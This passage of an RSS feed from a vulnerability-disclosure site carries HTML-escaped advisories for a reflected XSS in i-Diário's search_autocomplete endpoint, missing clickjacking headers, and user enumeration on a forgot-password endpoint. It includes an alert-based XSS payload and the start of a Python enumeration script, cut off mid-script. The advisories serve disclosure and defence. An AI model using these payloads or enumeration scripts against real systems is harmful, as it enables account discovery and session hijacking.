    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9107-cross-site-scripting-xss-reflected-in-endpoint-search_autocomplete-parameter-q&amp;#34;&amp;gt;CVE-2025-9107: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9107&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9107/image.png&amp;#34;
	width=&amp;#34;861&amp;#34;
	height=&amp;#34;1054&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9107/image_hu_8aadeff40c8f3d51.png 480w, /p/cve-2025-9107/image_hu_3012aeb2aec1845.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;196px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9108</title>
        <link>https://www.cvehunters.com/p/cve-2025-9108/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9108/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9108-missing-x-frame-options-or-content-security-policy-headers&amp;#34;&amp;gt;CVE-2025-9108: Missing &amp;lt;code&amp;gt;X-Frame-Options&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;Content-Security-Policy&amp;lt;/code&amp;gt; Headers
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not implement protection mechanisms against &amp;lt;code&amp;gt;Clickjacking&amp;lt;/code&amp;gt;. This allows legitimate pages to be embedded within malicious iframes, leading users to interact with invisible or disguised elements, which can result in session hijacking, unintended actions, and other attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;https://x.x.x.x/login&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The HTTP response from the page does not include the following headers:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;X-Frame-Options&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Content-Security-Policy: frame-ancestors &amp;#39;none&amp;#39;;&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Application HTTP Response:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9108-missing-x-frame-options-or-content-security-policy-headers&amp;#34;&amp;gt;CVE-2025-9108: Missing &amp;lt;code&amp;gt;X-Frame-Options&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;Content-Security-Policy&amp;lt;/code&amp;gt; Headers
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not implement protection mechanisms against &amp;lt;code&amp;gt;Clickjacking&amp;lt;/code&amp;gt;. This allows legitimate pages to be embedded within malicious iframes, leading users to interact with invisible or disguised elements, which can result in session hijacking, unintended actions, and other attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;https://x.x.x.x/login&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The HTTP response from the page does not include the following headers:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;X-Frame-Options&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Content-Security-Policy: frame-ancestors &amp;#39;none&amp;#39;;&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Application HTTP Response:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;...
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Missing headers:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Frame-Options
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Security-Policy: frame-ancestors &amp;amp;#39;none&amp;amp;#39;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This absence allows the application to be embedded within &amp;lt;code&amp;gt;iframe&amp;lt;/code&amp;gt; elements on third-party websites.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Performing unauthorized actions: Attackers can trick users into clicking hidden buttons or links, executing critical actions without their consent.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Credential theft: A disguised click can lead users to enter sensitive information such as logins and passwords.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Transferring funds or unauthorized purchases: Users can be tricked into authorizing financial transactions on banking or e-commerce websites.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Changing account settings: Attackers can exploit clickjacking to trick victims into disabling security features or changing recovery emails.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Installing malware: Manipulated clicks can initiate the download of malicious files without the user&amp;#39;s knowledge.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Privilege escalation: In administrative applications, a forced click can grant elevated access to attackers.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Loss of trust: The impact The psychological and reputational impact on the organization can be significant, as users perceive the site as insecure.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://vuldb.com/?submit.627923&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://vuldb.com/?submit.627923&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/vanderlei50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vanderlei Princival&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9109</title>
        <link>https://www.cvehunters.com/p/cve-2025-9109/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9109/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9109-user-enumeration-vulnerability-was-identified-in-the-forgot-password-functionality&amp;#34;&amp;gt;CVE-2025-9109: User Enumeration vulnerability was identified in the &amp;lt;code&amp;gt;Forgot Password&amp;lt;/code&amp;gt; functionality
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A User Enumeration vulnerability was identified in the &amp;lt;code&amp;gt;Forgot Password&amp;lt;/code&amp;gt; functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When submitting a POST request to the endpoint &amp;lt;code&amp;gt;/password/email&amp;lt;/code&amp;gt;, the system returns different responses based on whether the provided login parameter corresponds to an existing user.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;For example:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;If the user &amp;lt;b&amp;gt;exists&amp;lt;/b&amp;gt;: the response contains a message such as: &amp;#34;A password reset link has been sent&amp;#34;.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;If the user &amp;lt;b&amp;gt;does not exist&amp;lt;/b&amp;gt;: the response contains a message like: &amp;#34;We couldn&amp;#39;t find a user with that login&amp;#34;.&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9109-user-enumeration-vulnerability-was-identified-in-the-forgot-password-functionality&amp;#34;&amp;gt;CVE-2025-9109: User Enumeration vulnerability was identified in the &amp;lt;code&amp;gt;Forgot Password&amp;lt;/code&amp;gt; functionality
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A User Enumeration vulnerability was identified in the &amp;lt;code&amp;gt;Forgot Password&amp;lt;/code&amp;gt; functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When submitting a POST request to the endpoint &amp;lt;code&amp;gt;/password/email&amp;lt;/code&amp;gt;, the system returns different responses based on whether the provided login parameter corresponds to an existing user.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;For example:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;If the user &amp;lt;b&amp;gt;exists&amp;lt;/b&amp;gt;: the response contains a message such as: &amp;#34;A password reset link has been sent&amp;#34;.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;If the user &amp;lt;b&amp;gt;does not exist&amp;lt;/b&amp;gt;: the response contains a message like: &amp;#34;We couldn&amp;#39;t find a user with that login&amp;#34;.&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This behavior allows an attacker to determine which usernames are valid by simply automating requests with different inputs. The vulnerability arises from a lack of uniform response for valid and invalid accounts during the password recovery process.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Python script was created to demonstrate this issue:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-python&amp;#34; data-lang=&amp;#34;python&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;import&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nn&amp;#34;&amp;gt;requests&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;url&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://x.x.x.x/password/email&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;
